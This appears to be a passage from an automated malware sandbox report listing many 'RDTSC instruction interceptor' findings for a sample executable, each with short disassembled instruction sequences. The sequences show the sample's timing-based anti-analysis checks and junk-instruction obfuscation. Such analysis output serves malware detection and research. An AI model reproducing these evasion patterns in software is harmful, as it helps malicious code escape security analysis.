jmp 00007FE100E1706Eh 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f push edi 0x00000060 pop edi 0x00000061 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A22B47 second address: A22B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A22B4D second address: A22B72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FE100E17076h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A22B72 second address: A22B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FE1010EA786h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1C43B second address: A1C441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A21BDD second address: A21BE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A21BE3 second address: A21BEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A21BEA second address: A21BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A23B2A second address: A23B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A22C62 second address: A22C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE1010EA796h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A22C7F second address: A22C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A24BA4 second address: A24BAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A24BAA second address: A24C38 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE100E1706Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FE100E17068h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+129E394Dh] 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FE100E17068h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Ah 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e call 00007FE100E17068h 0x00000053 pop edi 0x00000054 mov dword ptr [esp+04h], edi 0x00000058 add dword ptr [esp+04h], 00000017h 0x00000060 inc edi 0x00000061 push edi 0x00000062 ret 0x00000063 pop edi 0x00000064 ret 0x00000065 mov dword ptr [ebp+129E21D4h], ebx 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f jns 00007FE100E17066h 0x00000075 pop eax 0x00000076 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A24DB5 second address: A24DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A24DBB second address: A24DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A24E84 second address: A24E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A24E8A second address: A24E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 ja 00007FE100E17066h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BA34 second address: A2BA4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007FE1010EA786h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BA4B second address: A2BA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BCFB second address: A2BD01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BD01 second address: A2BD10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jl 00007FE100E17066h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BD10 second address: A2BD1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 js 00007FE1010EA786h 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BD1F second address: A2BD25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BD25 second address: A2BD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA78Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FE1010EA786h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BD44 second address: A2BD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BD48 second address: A2BD4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2E850 second address: A2E854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2E854 second address: A2E877 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FE1010EA78Ch 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2E877 second address: A2E87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2E87D second address: A2E8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE1010EA799h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE1010EA797h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2E8B6 second address: A2E8C0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE100E17066h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9C529B second address: 9C52CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FE1010EA786h 0x0000000c jng 00007FE1010EA786h 0x00000012 popad 0x00000013 jmp 00007FE1010EA797h 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9C52CD second address: 9C52D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9C52D8 second address: 9C52DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A32997 second address: A3299B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3299B second address: A329D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE1010EA78Eh 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FE1010EA796h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007FE1010EA78Ch 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A32ABB second address: A32AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A38F1F second address: A38F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FE1010EA78Ch 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A395B4 second address: A395BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A395BB second address: A395D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE1010EA790h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39C86 second address: A39C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39C93 second address: A39C9D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39C9D second address: A39CA7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE100E1706Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39CA7 second address: A39CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jns 00007FE1010EA786h 0x0000000d jl 00007FE1010EA786h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39E07 second address: A39E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jp 00007FE100E17066h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39E15 second address: A39E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39F65 second address: A39F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39F69 second address: A39F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39F6D second address: A39F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39F73 second address: A39F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FE1010EA78Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39F81 second address: A39F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007FE100E17066h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3E5DF second address: A3E5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA78Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3E5F3 second address: A3E5F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3E5F7 second address: A3E614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA793h 0x00000007 jl 00007FE1010EA786h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3E614 second address: A3E61B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3E61B second address: A3E624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0803A second address: A08048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FE100E17066h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08048 second address: A08062 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FE1010EA78Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08062 second address: A08068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08068 second address: A0806C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0806C second address: A080B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FE100E17068h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov ecx, dword ptr [ebp+12B6C6A9h] 0x00000029 lea eax, dword ptr [ebp+12B91DCFh] 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FE100E1706Fh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08678 second address: A0867D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A087C0 second address: A087C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A087C6 second address: A087CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A087CA second address: A087CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0885E second address: A08885 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA78Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE1010EA792h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08885 second address: A0888A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A088F7 second address: A088FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0BEE5 second address: A0BEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FE100E17068h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08AC5 second address: A08ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08ACB second address: A08ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08BC3 second address: A08BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08BC8 second address: A08BCD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08C01 second address: A08C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0940F second address: A09444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 nop 0x00000007 sub dword ptr [ebp+129E2F54h], eax 0x0000000d or edx, 552E5C76h 0x00000013 lea eax, dword ptr [ebp+12B91E13h] 0x00000019 push esi 0x0000001a xor cx, BC05h 0x0000001f pop edx 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FE100E17072h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A09444 second address: A0947B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FE1010EA78Eh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, eax 0x00000010 lea eax, dword ptr [ebp+12B91DCFh] 0x00000016 add edx, dword ptr [ebp+129E38F9h] 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FE1010EA78Fh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0947B second address: 9F2B6D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE100E17068h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jne 00007FE100E1706Ch 0x00000014 push eax 0x00000015 jbe 00007FE100E17066h 0x0000001b pop eax 0x0000001c popad 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007FE100E17068h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 xor ecx, dword ptr [ebp+129E3B35h] 0x0000003e call dword ptr [ebp+129E2F6Eh] 0x00000044 push eax 0x00000045 jo 00007FE100E17068h 0x0000004b pushad 0x0000004c popad 0x0000004d push eax 0x0000004e push edx 0x0000004f jl 00007FE100E17066h 0x00000055 jmp 00007FE100E17078h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3D8E7 second address: A3D8ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3D8ED second address: A3D90C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE100E17066h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FE100E17070h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3D90C second address: A3D92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 je 00007FE1010EA79Dh 0x0000000e jmp 00007FE1010EA791h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3D92D second address: A3D945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE100E17070h 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3DA9B second address: A3DAA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3DE3F second address: A3DE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3DE45 second address: A3DE4F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4660E second address: A46635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007FE100E17075h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A468AD second address: A468B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A46C41 second address: A46C60 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE100E17072h 0x00000008 jl 00007FE100E17066h 0x0000000e jnc 00007FE100E17066h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 ja 00007FE100E17086h 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A46369 second address: A4637C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FE1010EA78Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
